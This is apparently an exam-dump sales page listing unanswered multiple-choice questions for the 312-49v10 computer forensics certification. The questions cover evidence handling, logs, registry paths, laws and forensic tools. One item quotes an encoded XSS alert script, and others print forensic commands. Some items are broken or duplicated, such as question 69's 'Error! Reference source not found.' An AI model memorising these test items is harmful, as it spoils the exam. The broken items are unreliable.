Black Friday Sale - Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65percent

Welcome To DumpsPedia

312-49v10 Sample Questions Answers

Questions 4

You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?

Options:

A.

Throw the hard disk into the fire

B.

Run the powerful magnets over the hard disk

C.

Format the hard disk multiple times using a low level disk utility

D.

Overwrite the contents of the hard disk with Junk data

Buy Now
Questions 5

Which of the following information is displayed when Netstat is used with -ano switch?

Options:

A.

Ethernet statistics

B.

Contents of IP routing table

C.

Details of routing table

D.

Details of TCP and UDP connections

Buy Now
Questions 6

Which of the following statements is TRUE about SQL Server error logs?

Options:

A.

SQL Server error logs record all the events occurred on the SQL Server and its databases

B.

Forensic investigator uses SQL Server Profiler to view error log files

C.

Error logs contain IP address of SQL Server client connections

D.

Trace files record, user-defined events, and specific system events

Buy Now
Questions 7

Which among the following tools can help a forensic investigator to access the registry files during postmortem analysis?

Options:

A.

RegistryChangesView

B.

RegDIIView

C.

RegRipper

D.

ProDiscover

Buy Now
Questions 8

Adam, a forensic analyst, is preparing VMs for analyzing a malware. Which of the following is NOT a best practice?

Options:

A.

Isolating the host device

B.

Installing malware analysis tools

C.

Using network simulation tools

D.

Enabling shared folders

Buy Now
Questions 9

Which of the following Perl scripts will help an investigator to access the executable image of a process?

Options:

A.

Lspd.pl

B.

Lpsi.pl

C.

Lspm.pl

D.

Lspi.pl

Buy Now
Questions 10

Which of the following is a federal law enacted in the US to control the ways that financial institutions deal with the private information of individuals?

Options:

A.

SOX

B.

HIPAA 1996

C.

GLBA

D.

PCI DSS

Buy Now
Questions 11

In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?

Options:

A.

Chosen-message attack

B.

Known-cover attack

C.

Known-message attack

D.

Known-stego attack

Buy Now
Questions 12

What does Locard's Exchange Principle state?

Options:

A.

Any information of probative value that is either stored or transmitted in a digital form

B.

Digital evidence must have some characteristics to be disclosed in the court of law

C.

Anyone or anything, entering a crime scene takes something of the scene with them, and leaves something of themselves behind when they leave

D.

Forensic investigators face many challenges during forensics investigation of a digital crime, such as extracting, preserving, and analyzing the digital evidence

Buy Now
Questions 13

Which among the following search warrants allows the first responder to search and seize the victim’s computer components such as hardware, software, storage devices, and documentation?

Options:

A.

John Doe Search Warrant

B.

Citizen Informant Search Warrant

C.

Electronic Storage Device Search Warrant

D.

Service Provider Search Warrant

Buy Now
Questions 14

While collecting Active Transaction Logs using SQL Server Management Studio, the query Select * from ::fn_dblog(NULL, NULL) displays the active portion of the transaction log file. Here, assigning NULL values implies?

Options:

A.

Start and end points for log sequence numbers are specified

B.

Start and end points for log files are not specified

C.

Start and end points for log files are specified

D.

Start and end points for log sequence numbers are not specified

Buy Now
Questions 15

Tasklist command displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer. Which of the following tasklist commands provides information about the listed processes, including the image name, PID, name, and number of the session for the process?

Options:

A.

tasklist /p

B.

tasklist /v

C.

tasklist /u

D.

tasklist /s

Buy Now
Questions 16

%3cscript%3ealert(”XXXXXXXX”)%3c/script%3e is a script obtained from a Cross-Site Scripting attack. What type of encoding has the attacker employed?

Options:

A.

Double encoding

B.

Hex encoding

C.

Unicode

D.

Base64

Buy Now
Questions 17

If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

Options:

A.

The zombie will not send a response

B.

31402

C.

31399

D.

31401

Buy Now
Questions 18

You are asked to build a forensic lab and your manager has specifically informed you to use copper for lining the walls, ceilings, and floor. What is the main purpose of lining the walls, ceilings, and floor with copper?

Options:

A.

To control the room temperature

B.

To strengthen the walls, ceilings, and floor

C.

To avoid electromagnetic emanations

D.

To make the lab sound proof

Buy Now
Questions 19

A forensic examiner encounters a computer with a failed OS installation and the master boot record (MBR) or partition sector damaged. Which of the following tools can find and restore files and Information In the disk?

Options:

A.

Helix

B.

R-Studio

C.

NetCat

D.

Wireshark

Buy Now
Questions 20

When Investigating a system, the forensics analyst discovers that malicious scripts were Injected Into benign and trusted websites. The attacker used a web application to send malicious code. In the form of a browser side script, to a different end-user. What attack was performed here?

Options:

A.

Brute-force attack

B.

Cookie poisoning attack

C.

Cross-site scripting attack

D.

SQL injection attack

Buy Now
Questions 21

Bob has encountered a system crash and has lost vital data stored on the hard drive of his Windows computer. He has no cloud storage or backup hard drives. He wants to recover all the data, which includes his personal photos, music, documents, videos, official emails, etc. Which of the following tools shall resolve Bob's purpose?

Options:

A.

Cain & Abel

B.

Recuva

C.

Xplico

D.

Colasoft’s Capsa

Buy Now
Questions 22

An investigator is analyzing a checkpoint firewall log and comes across symbols. What type of log is he looking at?

Options:

A.

Security event was monitored but not stopped

B.

Malicious URL detected

C.

An email marked as potential spam

D.

Connection rejected

Buy Now
Questions 23

Where should the investigator look for the Edge browser’s browsing records, including history, cache, and cookies?

Options:

A.

ESE Database

B.

Virtual Memory

C.

Sparse files

D.

Slack Space

Buy Now
Questions 24

Which tool allows dumping the contents of process memory without stopping the process?

Options:

A.

psdump.exe

B.

pmdump.exe

C.

processdump.exe

D.

pdump.exe

Buy Now
Questions 25

MAC filtering is a security access control methodology, where a ___________ is assigned to each network card to determine access to the network.

Options:

A.

48-bit address

B.

24-bit address

C.

16-bit address

D.

32-bit address

Buy Now
Questions 26

Which of the following tool is used to locate IP addresses?

Options:

A.

SmartWhois

B.

Deep Log Analyzer

C.

Towelroot

D.

XRY LOGICAL

Buy Now
Questions 27

Investigators can use the Type Allocation Code (TAC) to find the model and origin of a mobile device. Where is TAC located in mobile devices?

Options:

A.

International Mobile Equipment Identifier (IMEI)

B.

Integrated circuit card identifier (ICCID)

C.

International mobile subscriber identity (IMSI)

D.

Equipment Identity Register (EIR)

Buy Now
Questions 28

Which of these ISO standards define the file system for optical storage media, such as CD-ROM and DVD-ROM?

Options:

A.

ISO 9660

B.

ISO 13346

C.

ISO 9960

D.

ISO 13490

Buy Now
Questions 29

Which of the following examinations refers to the process of providing the opposing side in a trial the opportunity to question a witness?

Options:

A.

Cross Examination

B.

Direct Examination

C.

Indirect Examination

D.

Witness Examination

Buy Now
Questions 30

In Linux OS, different log files hold different information, which help the investigators to analyze various issues during a security incident. What information can the investigators obtain from the log file

var/log/dmesg?

Options:

A.

Kernel ring buffer information

B.

All mail server message logs

C.

Global system messages

D.

Debugging log messages

Buy Now
Questions 31

Which list contains the most recent actions performed by a Windows User?

Options:

A.

MRU

B.

Activity

C.

Recents

D.

Windows Error Log

Buy Now
Questions 32

Which of the following statements is TRUE with respect to the Registry settings in the user start-up folder HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\.

Options:

A.

All the values in this subkey run when specific user logs on, as this setting is user-specific

B.

The string specified in the value run executes when user logs on

C.

All the values in this key are executed at system start-up

D.

All values in this subkey run when specific user logs on and then the values are deleted

Buy Now
Questions 33

Which of the following protocols allows non-ASCII files, such as video, graphics, and audio, to be sent through the email messages?

Options:

A.

MIME

B.

BINHEX

C.

UT-16

D.

UUCODE

Buy Now
Questions 34

Which of the following is NOT an anti-forensics technique?

Options:

A.

Data Deduplication

B.

Password Protection

C.

Encryption

D.

Steganography

Buy Now
Questions 35

Which of the following is a MAC-based File Recovery Tool?

Options:

A.

VirtualLab

B.

GetDataBack

C.

Cisdem DataRecovery 3

D.

Smart Undeleter

Buy Now
Questions 36

Which of the following is NOT an anti-forensics technique?

Options:

A.

Data Deduplication

B.

Steganography

C.

Encryption

D.

Password Protection

Buy Now
Questions 37

What does the bytes 0x0B-0x53 represent in the boot sector of NTFS volume on Windows 2000?

Options:

A.

Jump instruction and the OEM ID

B.

BIOS Parameter Block (BPB) and the OEM ID

C.

BIOS Parameter Block (BPB) and the extended BPB

D.

Bootstrap code and the end of the sector marker

Buy Now
Questions 38

Which of the following file formats allows the user to compress the acquired data as well as keep it randomly accessible?

Options:

A.

Proprietary Format

B.

Generic Forensic Zip (gfzip)

C.

Advanced Forensic Framework 4

D.

Advanced Forensics Format (AFF)

Buy Now
Questions 39

In both pharming and phishing attacks an attacker can create websites that look similar to legitimate sites with the intent of collecting personal identifiable information from its victims. What is the difference between pharming and phishing attacks?

Options:

A.

Both pharming and phishing attacks are purely technical and are not considered forms of social engineering

B.

In a pharming attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name

C.

In a phishing attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual websites domain name

D.

Both pharming and phishing attacks are identical

Buy Now
Questions 40

In which cloud crime do attackers try to compromise the security of the cloud environment in order to steal data or inject a malware?

Options:

A.

Cloud as an Object

B.

Cloud as a Tool

C.

Cloud as an Application

D.

Cloud as a Subject

Buy Now
Questions 41

Amber, a black hat hacker, has embedded malware into a small enticing advertisement and posted it on a popular ad-network that displays across various websites. What is she doing?

Options:

A.

Malvertising

B.

Compromising a legitimate site

C.

Click-jacking

D.

Spearphishing

Buy Now
Questions 42

James is dealing with a case regarding a cybercrime that has taken place in Arizona, USA. James needs to lawfully seize the evidence from an electronic device without affecting the user's anonymity. Which of the following law should he comply with, before retrieving the evidence?

Options:

A.

First Amendment of the U.S. Constitution

B.

Fourth Amendment of the U.S. Constitution

C.

Third Amendment of the U.S. Constitution

D.

Fifth Amendment of the U.S. Constitution

Buy Now
Questions 43

Which of the following is a non-zero data that an application allocates on a hard disk cluster in systems running on Windows OS?

Options:

A.

Sparse File

B.

Master File Table

C.

Meta Block Group

D.

Slack Space

Buy Now
Questions 44

Which of the following email headers specifies an address for mailer-generated errors, like "no such user" bounce messages, to go to (instead of the sender's address)?

Options:

A.

Mime-Version header

B.

Content-Type header

C.

Content-Transfer-Encoding header

D.

Errors-To header

Buy Now
Questions 45

Which of the following processes is part of the dynamic malware analysis?

Options:

A.

Process Monitoring

B.

Malware disassembly

C.

Searching for the strings

D.

File fingerprinting

Buy Now
Questions 46

Data Files contain Multiple Data Pages, which are further divided into Page Header, Data Rows, and Offset Table. Which of the following is true for Data Rows?

Options:

A.

Data Rows store the actual data

B.

Data Rows present Page type. Page ID, and so on

C.

Data Rows point to the location of actual data

D.

Data Rows spreads data across multiple databases

Buy Now
Questions 47

A section of your forensics lab houses several electrical and electronic equipment. Which type of fire extinguisher you must install in this area to contain any fire incident?

Options:

A.

Class B

B.

Class D

C.

Class C

D.

Class A

Buy Now
Questions 48

You are assigned a task to examine the log files pertaining to MyISAM storage engine. While examining, you are asked to perform a recovery operation on a MyISAM log file. Which among the following MySQL Utilities allow you to do so?

Options:

A.

mysqldump

B.

myisamaccess

C.

myisamlog

D.

myisamchk

Buy Now
Questions 49

What does the Rule 101 of Federal Rules of Evidence states?

Options:

A.

Scope of the Rules, where they can be applied

B.

Purpose of the Rules

C.

Limited Admissibility of the Evidence

D.

Rulings on Evidence

Buy Now
Questions 50

What do you call the process in which an attacker uses magnetic field over the digital media device to delete any previously stored data?

Options:

A.

Disk deletion

B.

Disk cleaning

C.

Disk degaussing

D.

Disk magnetization

Buy Now
Questions 51

Examination of a computer by a technically unauthorized person will almost always result in:

Options:

A.

Rendering any evidence found inadmissible in a court of law

B.

Completely accurate results of the examination

C.

The chain of custody being fully maintained

D.

Rendering any evidence found admissible in a court of law

Buy Now
Questions 52

What feature of Windows is the following command trying to utilize?

Options:

A.

White space

B.

AFS

C.

ADS

D.

Slack file

Buy Now
Questions 53

Which cloud model allows an investigator to acquire the instance of a virtual machine and initiate the forensics examination process?

Options:

A.

PaaS model

B.

IaaS model

C.

SaaS model

D.

SecaaS model

Buy Now
Questions 54

Smith, a network administrator with a large MNC, was the first to arrive at a suspected crime scene involving criminal use of compromised computers. What should be his first response while maintaining the integrity of evidence?

Options:

A.

Record the system state by taking photographs of physical system and the display

B.

Perform data acquisition without disturbing the state of the systems

C.

Open the systems, remove the hard disk and secure it

D.

Switch off the systems and carry them to the laboratory

Buy Now
Questions 55

All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism?

Options:

A.

Blackberry Message Center

B.

Microsoft Exchange

C.

Blackberry WAP gateway

D.

Blackberry WEP gateway

Buy Now
Questions 56

What is one method of bypassing a system BIOS password?

Options:

A.

Removing the processor

B.

Removing the CMOS battery

C.

Remove all the system memory

D.

Login to Windows and disable the BIOS password

Buy Now
Questions 57

Data is striped at a byte level across multiple drives, and parity information is distributed among all member drives.

What RAID level is represented here?

Options:

A.

RAID Level 0

B.

RAID Level 5

C.

RAID Level 3

D.

RAID Level 1

Buy Now
Questions 58

When should an MD5 hash check be performed when processing evidence?

Options:

A.

After the evidence examination has been completed

B.

On an hourly basis during the evidence examination

C.

Before and after evidence examination

D.

Before the evidence examination has been completed

Buy Now
Questions 59

Bob works as information security analyst for a big finance company. One day, the anomaly-based intrusion detection system alerted that a volumetric DDOS targeting the main IP of the main web server was occurring. What kind of attack is it?

Options:

A.

IDS attack

B.

APT

C.

Web application attack

D.

Network attack

Buy Now
Questions 60

Which of the following refers to the process of the witness being questioned by the attorney who called the latter to the stand?

Options:

A.

Witness Authentication

B.

Direct Examination

C.

Expert Witness

D.

Cross Questioning

Buy Now
Questions 61

Jacky encrypts her documents using a password. It is known that she uses her daughter’s year of birth as part of the password. Which password cracking technique would be optimal to crack her password?

Options:

A.

Rule-based attack

B.

Brute force attack

C.

Syllable attack

D.

Hybrid attack

Buy Now
Questions 62

Which of the following tool creates a bit-by-bit image of an evidence media?

Options:

A.

Recuva

B.

FileMerlin

C.

AccessData FTK Imager

D.

Xplico

Buy Now
Questions 63

Which of the following commands shows you the names of all open shared files on a server and the number of file locks on each file?

Options:

A.

Net config

B.

Net file

C.

Net share

D.

Net sessions

Buy Now
Questions 64

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

Options:

A.

Security Administrator

B.

Network Administrator

C.

Director of Information Technology

D.

Director of Administration

Buy Now
Questions 65

What is the default IIS log location?

Options:

A.

SystemDrive\inetpub\LogFiles

B.

%SystemDrive%\inetpub\logs\LogFiles

C.

%SystemDrive\logs\LogFiles

D.

SystemDrive\logs\LogFiles

Buy Now
Questions 66

What file is processed at the end of a Windows XP boot to initialize the logon dialog box?

Options:

A.

NTOSKRNL.EXE

B.

NTLDR

C.

LSASS.EXE

D.

NTDETECT.COM

Buy Now
Questions 67

Which of the following are small pieces of data sent from a website and stored on the user’s computer by the user’s web browser to track, validate, and maintain specific user information?

Options:

A.

Temporary Files

B.

Open files

C.

Cookies

D.

Web Browser Cache

Buy Now
Questions 68

What is the name of the Standard Linux Command that is also available as windows application that can be used to create bit-stream images?

Options:

A.

mcopy

B.

image

C.

MD5

D.

dd

Buy Now
Questions 69

John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found. What information will he be able to gather from this?

Options:

A.

Hillary network username and password hash

B.

The SID of Hillary network account

C.

The SAM file from Hillary computer

D.

The network shares that Hillary has permissions

Buy Now
Questions 70

How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?

Options:

A.

128

B.

64

C.

32

D.

16

Buy Now
Questions 71

Which part of Metasploit framework helps users to hide the data related to a previously deleted file or currently unused by the allocated file.

Options:

A.

Waffen FS

B.

RuneFS

C.

FragFS

D.

Slacker

Buy Now
Questions 72

Identify the term that refers to individuals who, by virtue of their knowledge and expertise, express an independent opinion on a matter related to a case based on the information that is provided.

Options:

A.

Expert Witness

B.

Evidence Examiner

C.

Forensic Examiner

D.

Defense Witness

Buy Now
Questions 73

Which of the following tasks DOES NOT come under the investigation phase of a cybercrime forensics investigation case?

Options:

A.

Data collection

B.

Secure the evidence

C.

First response

D.

Data analysis

Buy Now
Questions 74

Which of the following files stores information about local Dropbox installation and account, email IDs linked with the account, current version/build for the local application, the host_id, and local path information?

Options:

A.

host.db

B.

sigstore.db

C.

config.db

D.

filecache.db

Buy Now
Questions 75

Which US law does the interstate or international transportation and receiving of child pornography fall under?

Options:

A.

§18. U.S.C. 1466A

B.

§18. U.S.C 252

C.

§18. U.S.C 146A

D.

§18. U.S.C 2252

Buy Now
Questions 76

NTFS has reduced slack space than FAT, thus having lesser potential to hide data in the slack space. This is because:

Options:

A.

FAT does not index files

B.

NTFS is a journaling file system

C.

NTFS has lower cluster size space

D.

FAT is an older and inefficient file system

Buy Now
Questions 77

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?

Options:

A.

The registry

B.

The swap file

C.

The recycle bin

D.

The metadata

Buy Now
Questions 78

For the purpose of preserving the evidentiary chain of custody, which of the following labels is not appropriate?

Options:

A.

Relevant circumstances surrounding the collection

B.

General description of the evidence

C.

Exact location the evidence was collected from

D.

SSN of the person collecting the evidence

Buy Now
Questions 79

What is the extension used by Windows OS for shortcut files present on the machine?

Options:

A.

.log

B.

.pf

C.

.lnk

D.

.dat

Buy Now
Questions 80

Matthew has been assigned the task of analyzing a suspicious MS Office document via static analysis over an Ubuntu-based forensic machine. He wants to see what type of document It Is. whether It Is encrypted, or contains any flash objects/VBA macros. Which of the following python-based script should he run to get relevant information?

Options:

A.

oleform.py

B.

oleid.py

C.

oledir.py

D.

pdfid.py

Buy Now
Questions 81

Which code does the FAT file system use to mark the file as deleted?

Options:

A.

ESH

B.

5EH

C.

H5E

D.

E5H

Buy Now
Questions 82

Which of the following techniques can be used to beat steganography?

Options:

A.

Encryption

B.

Steganalysis

C.

Decryption

D.

Cryptanalysis

Buy Now
Questions 83

Which program is the bootloader when Windows XP starts up?

Options:

A.

KERNEL.EXE

B.

NTLDR

C.

LOADER

D.

LILO

Buy Now
Questions 84

Travis, a computer forensics investigator, is finishing up a case he has been working on for over a month involving copyright infringement and embezzlement. His last task is to prepare an investigative report for the president of the company he has been working for. Travis must submit a hard copy and an electronic copy to this president. In what electronic format should Travis send this report?

Options:

A.

TIFF-8

B.

DOC

C.

WPD

D.

PDF

Buy Now
Questions 85

When marking evidence that has been collected with the “aaa/ddmmyy/nnnn/zz” format, what does the “nnnn” denote?

Options:

A.

The initials of the forensics analyst

B.

The sequence number for the parts of the same exhibit

C.

The year he evidence was taken

D.

The sequential number of the exhibits seized by the analyst

Buy Now
Questions 86

Pagefile.sys is a virtual memory file used to expand the physical memory of a computer. Select the registry path for the page file:

Options:

A.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

B.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\System Management

C.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Device Management

D.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

Buy Now
Questions 87

What will the following command accomplish in Linux?

fdisk /dev/hda

Options:

A.

Partition the hard drive

B.

Format the hard drive

C.

Delete all files under the /dev/hda folder

D.

Fill the disk with zeros

Buy Now
Questions 88

What type of attack sends SYN requests to a target system with spoofed IP addresses?

Options:

A.

SYN flood

B.

Ping of death

C.

Cross site scripting

D.

Land

Buy Now
Questions 89

Jason discovered a file named $RIYG6VR.doc in the C:\$Recycle.Bin\\ while analyzing a hard disk image for the deleted data. What inferences can he make from the file name?

Options:

A.

It is a doc file deleted in seventh sequential order

B.

RIYG6VR.doc is the name of the doc file deleted from the system

C.

It is file deleted from R drive

D.

It is a deleted doc file

Buy Now
Questions 90

Which of the following tools will help the investigator to analyze web server logs?

Options:

A.

XRY LOGICAL

B.

LanWhois

C.

Deep Log Monitor

D.

Deep Log Analyzer

Buy Now
Questions 91

What will the following Linux command accomplish?

dd if=/dev/mem of=/home/sam/mem.bin bs=1024

Options:

A.

Copy the master boot record to a file

B.

Copy the contents of the system folder to a file

C.

Copy the running memory to a file

D.

Copy the memory dump file to an image file

Buy Now
Questions 92

Which of the following Registry components include offsets to other cells as well as the LastWrite time for the key?

Options:

A.

Value list cell

B.

Value cell

C.

Key cell

D.

Security descriptor cell

Buy Now
Questions 93

Jack Smith is a forensics investigator who works for Mason Computer Investigation Services. He is investigating a computer that was infected by Ramen Virus.

He runs the netstat command on the machine to see its current connections. In the following screenshot, what do the 0.0.0.0 IP addresses signify?

 

Options:

A.

Those connections are established

B.

Those connections are in listening mode

C.

Those connections are in closed/waiting mode

D.

Those connections are in timed out/waiting mode

Buy Now
Questions 94

What malware analysis operation can the investigator perform using the jv16 tool?

Options:

A.

Files and Folder Monitor

B.

Installation Monitor

C.

Network Traffic Monitoring/Analysis

D.

Registry Analysis/Monitoring

Buy Now
Questions 95

Which of the following commands shows you the username and IP address used to access the system via a remote login session and the type of client from which they are accessing the system?

Options:

A.

Net config

B.

Net sessions

C.

Net share

D.

Net stat

Buy Now
Questions 96

George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network.

What filter should George use in Ethereal?

Options:

A.

src port 23 and dst port 23

B.

udp port 22 and host 172.16.28.1/24

C.

net port 22

D.

src port 22 and dst port 22

Buy Now
Questions 97

What binary coding is used most often for e-mail purposes?

Options:

A.

MIME

B.

Uuencode

C.

IMAP

D.

SMTP

Buy Now
Questions 98

When obtaining a warrant, it is important to:

Options:

A.

particularlydescribe the place to be searched and particularly describe the items to be seized

B.

generallydescribe the place to be searched and particularly describe the items to be seized

C.

generallydescribe the place to be searched and generally describe the items to be seized

D.

particularlydescribe the place to be searched and generally describe the items to be seized

Buy Now
Questions 99

Jack is reviewing file headers to verify the file format and hopefully find more Information of the file. After a careful review of the data chunks through a hex editor; Jack finds the binary value Oxffd8ff. Based on the above Information, what type of format is the file/image saved as?

Options:

A.

BMP

B.

GIF

C.

ASCII

D.

JPEG

Buy Now
Questions 100

John is working on his company policies and guidelines. The section he is currently working on covers company documents; how they should be handled, stored, and eventually destroyed. John is concerned about the process whereby outdated documents are destroyed. What type of shredder should John write in the guidelines to be used when destroying documents?

Options:

A.

Strip-cut shredder

B.

Cross-cut shredder

C.

Cross-hatch shredder

D.

Cris-cross shredder

Buy Now
Questions 101

What must be obtained before an investigation is carried out at a location?

Options:

A.

Search warrant

B.

Subpoena

C.

Habeas corpus

D.

Modus operandi

Buy Now
Questions 102

Given the drive dimensions as follows and assuming a sector has 512 bytes, what is the capacity of the described hard drive?

22,164 cylinders/disk

80 heads/cylinder

63 sectors/track

Options:

A.

53.26 GB

B.

57.19 GB

C.

11.17 GB

D.

10 GB

Buy Now
Questions 103

Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ?

Options:

A.

Typography

B.

Steganalysis

C.

Picture encoding

D.

Steganography

Buy Now
Questions 104

Which of the following is a record of the characteristics of a file system, including its size, the block size, the empty and the filled blocks and their respective counts, the size and location of the inode tables, the disk block map and usage information, and the size of the block groups?

Options:

A.

Inode bitmap block

B.

Superblock

C.

Block bitmap block

D.

Data block

Buy Now
Questions 105

What will the following command accomplish?

dd if=/dev/xxx of=mbr.backup bs=512 count=1

Options:

A.

Back up the master boot record

B.

Restore the master boot record

C.

Mount the master boot record on the first partition of the hard drive

D.

Restore the first 512 bytes of the first partition of the hard drive

Buy Now
Questions 106

Julie is a college student majoring in Information Systems and Computer Science. She is currently writing an essay for her computer crimes class. Julie paper focuses on white-collar crimes in America and how forensics investigators investigate the cases. Julie would like to focus the subject. Julie would like to focus the subject of the essay on the most common type of crime found in corporate America. What crime should Julie focus on?

Options:

A.

Physical theft

B.

Copyright infringement

C.

Industrial espionage

D.

Denial of Service attacks

Buy Now
Questions 107

What does the 63.78.199.4(161) denotes in a Cisco router log?

Mar 14 22:57:53.425 EST: %SEC-6-IPACCESSLOGP: list internet-inbound denied udp 66.56.16.77(1029) -> 63.78.199.4(161), 1 packet

Options:

A.

Destination IP address

B.

Source IP address

C.

Login IP address

D.

None of the above

Buy Now
Questions 108

An expert witness is a __________________ who is normally appointed by a party to assist the formulation and preparation of a party’s claim or defense.

Options:

A.

Expert in criminal investigation

B.

Subject matter specialist

C.

Witness present at the crime scene

D.

Expert law graduate appointed by attorney

Buy Now
Questions 109

On an Active Directory network using NTLM authentication, where on the domain controllers are the passwords stored?

Options:

A.

SAM

B.

AMS

C.

Shadow file

D.

Password.conf

Buy Now
Questions 110

Which of the following is NOT a part of pre-investigation phase?

Options:

A.

Building forensics workstation

B.

Gathering information about the incident

C.

Gathering evidence data

D.

Creating an investigation team

Buy Now
Questions 111

Which of the following files gives information about the client sync sessions in Google Drive on Windows?

Options:

A.

sync_log.log

B.

Sync_log.log

C.

sync.log

D.

Sync.log

Buy Now
Questions 112

Harold is a computer forensics investigator working for a consulting firm out of Atlanta Georgia. Harold is called upon to help with a corporate espionage case in Miami Florida. Harold assists in the investigation by pulling all the data from the computers allegedly used in the illegal activities. He finds that two suspects in the company where stealing sensitive corporate information and selling it to competing companies. From the email and instant messenger logs recovered, Harold has discovered that the two employees notified the buyers by writing symbols on the back of specific stop signs. This way, the buyers knew when and where to meet with the alleged suspects to buy the stolen material. What type of steganography did these two suspects use?

Options:

A.

Text semagram

B.

Visual semagram

C.

Grill cipher

D.

Visual cipher

Buy Now
Questions 113

You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing?

Options:

A.

Show outdated equipment so it can be replaced

B.

List weak points on their network

C.

Use attack as a launching point to penetrate deeper into the network

D.

Demonstrate that no system can be protected against DoS attacks

Buy Now
Questions 114

Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?

Options:

A.

The manufacturer of the system compromised

B.

The logic, formatting and elegance of the code used in the attack

C.

The nature of the attack

D.

The vulnerability exploited in the incident

Buy Now
Questions 115

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?

Options:

A.

Any data not yet flushed to the system will be lost

B.

All running processes will be lost

C.

The /tmp directory will be flushed

D.

Power interruption will corrupt the pagefile

Buy Now
Questions 116

The process of restarting a computer that is already turned on through the operating system is called?

Options:

A.

Warm boot

B.

Ice boot

C.

Hot Boot

D.

Cold boot

Buy Now
Questions 117

During an investigation, an employee was found to have deleted harassing emails that were sent to someone else. The company was using Microsoft Exchange and had message tracking enabled. Where could the investigator search to find the message tracking log file on the Exchange server?

Options:

A.

C:\Program Files\Exchsrvr\servername.log

B.

D:\Exchsrvr\Message Tracking\servername.log

C.

C:\Exchsrvr\Message Tracking\servername.log

D.

C:\Program Files\Microsoft Exchange\srvr\servername.log

Buy Now
Questions 118

Which MySQL log file contains information on server start and stop?

Options:

A.

Slow query log file

B.

General query log file

C.

Binary log

D.

Error log file

Buy Now
Questions 119

The following is a log file screenshot from a default installation of IIS 6.0.

What time standard is used by IIS as seen in the screenshot?

Options:

A.

UTC

B.

GMT

C.

TAI

D.

UT

Buy Now
Questions 120

In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on "bringing down the Internet". Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves?

Options:

A.

The change in the routing fabric to bypass the affected router

B.

More RESET packets to the affected router to get it to power back up

C.

RESTART packets to the affected router to get it to power back up

D.

STOP packets to all other routers warning of where the attack originated

Buy Now
Questions 121

The investigator wants to examine changes made to the system’s registry by the suspect program. Which of the following tool can help the investigator?

Options:

A.

TRIPWIRE

B.

RAM Capturer

C.

Regshot

D.

What’s Running

Buy Now
Questions 122

When using an iPod and the host computer is running Windows, what file system will be used?

Options:

A.

iPod+

B.

HFS

C.

FAT16

D.

FAT32

Buy Now
Questions 123

Which among the following files provides email header information in the Microsoft Exchange server?

Options:

A.

gwcheck.db

B.

PRIV.EDB

C.

PUB.EDB

D.

PRIV.STM

Buy Now
Questions 124

Which of these Windows utility help you to repair logical file system errors?

Options:

A.

Resource Monitor

B.

Disk cleanup

C.

Disk defragmenter

D.

CHKDSK

Buy Now
Questions 125

Steve, a forensic investigator, was asked to investigate an email incident in his organization. The organization has Microsoft Exchange Server deployed for email communications. Which among the following files will Steve check to analyze message headers, message text, and standard attachments?

Options:

A.

PUB.EDB

B.

PRIV.EDB

C.

PUB.STM

D.

PRIV.STM

Buy Now
Questions 126

Which among the following laws emphasizes the need for each Federal agency to develop, document, and implement an organization-wide program to provide information security for the information systems that support its operations and assets?

Options:

A.

FISMA

B.

HIPAA

C.

GLBA

D.

SOX

Buy Now
Questions 127

Select the tool appropriate for examining the dynamically linked libraries of an application or malware.

Options:

A.

DependencyWalker

B.

SysAnalyzer

C.

PEiD

D.

ResourcesExtract

Buy Now
Questions 128

"To ensure that the digital evidence is collected, preserved, examined, or transferred In a manner safeguarding the accuracy and reliability of the evidence, law enforcement, and forensics organizations must establish and maintain an effective quality system" Is a principle established by:

Options:

A.

NCIS

B.

NIST

C.

EC-Council

D.

SWGDE

Buy Now
Questions 129

What command-line tool enables forensic Investigator to establish communication between an Android device and a forensic workstation in order to perform data acquisition from the device?

Options:

A.

APK Analyzer

B.

SDK Manager

C.

Android Debug Bridge

D.

Xcode

Buy Now
Questions 130

